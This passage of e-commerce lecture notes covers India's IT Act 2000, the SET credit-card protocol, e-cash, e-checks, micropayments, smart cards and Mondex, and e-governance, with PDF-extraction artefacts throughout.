the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
